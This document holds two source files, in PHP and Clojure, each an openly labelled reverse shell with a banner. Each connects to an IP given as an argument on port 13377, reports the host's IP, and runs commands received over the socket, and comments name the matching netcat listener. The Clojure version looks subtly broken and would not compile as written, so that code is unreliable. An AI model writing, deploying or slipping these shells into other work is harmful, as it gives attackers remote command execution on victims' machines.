File: bc.php
#!/usr/bin/php
<?php
$we = "  _____            _      _____          _      
 |  __ \          | |    / ____|        | |     
 | |__) |___  __ _| |___| |     ___   __| | ___ 
 |  _  // _ \/ _` | |_  / |    / _ \ / _` |/ _ \
 | | \ \  __/ (_| | |/ /| |___| (_) | (_| |  __/
 |_|  \_\___|\__,_|_/___|\_____\___/ \__,_|\___|
";

$po = 13377; // nc -l -p 13377
set_time_limit($po);

if (isset($argv[1])) {
    $ip = $argv[1];
} else {
    echo "Please provide the IP address as a command-line argument.\n";
    exit(1);
}

$clientIp = gethostbyname(gethostname());
$we .= "Client IP: $clientIp\n";

$sock = @fsockopen($ip, $po, $errno, $errstr);
if ($errno != 0) {
    echo "$errno:$errstr";
} elseif (!$sock) {
    exit();
} else {
    echo "$ip:$po\n";
    fwrite($sock, "$we\n");
    
    while (!feof($sock)) {
        fwrite($sock, "$ ");
        $cmd = fgets($sock, $po);
        
        if (!empty($cmd)) {
            $output = '';
            $cmd = trim($cmd);
            
            if ($cmd === 'exit') {
                fclose($sock);
                exit();
            } else {
                $output = shell_exec($cmd);
            }
            
            fwrite($sock, $output);
        }
    }
    
    fclose($sock);
}

File: bc.clj
(ns reverse-shell
  (:require [clojure.java.io :as io])
  (:gen-class))
; nc -l -p 13377
(defn read-command [sock po]
  (binding [*in* (io/reader sock)
            *out* (io/writer sock)]
    (while true
      (print "$ ")
      (flush)
      (let [cmd (read-line)]
        (if (= cmd "exit")
          (do
            (.close sock)
            (System/exit 0))
          (let [process (-> (Runtime/getRuntime)
                            (.exec (into-array ["bash" "-c" cmd]))
                            .getInputStream)
                output (->> (io/reader process)
                            (line-seq)
                            (join "\n"))]
            (println output)
            (flush)))))))

(defn -main [& args]
  (let [banner
        "  _____            _      _____          _\n"      
        " |  __ \\          | |    / ____|        | |\n"     
        " | |__) |___  __ _| |___| |     ___   __| | ___\n" 
        " |  _  // _ \\/ _` | |_  / |    / _ \\ / _` |/ _ \\\n"
        " | | \\ \\  __/ (_| | |/ /| |___| (_) | (_| |  __/\n"
        " |_|  \\_\\___|\\__,_|_/___|\\_____\\___/ \\__,_|\\___|\n"]

    (when (empty? args)
      (println "Please provide the IP address as a command-line argument.")
      (System/exit 1))

    (let [ip (first args)
          client-ip (-> (java.net.InetAddress/getLocalHost)
                        .getHostAddress)]
      (with-open [sock (io/socket ip 13377)]
        (binding [*out* (io/writer sock)]
          (println banner)
          (println (str "Client IP: " client-ip))
          (flush))
        (read-command sock 13377))))
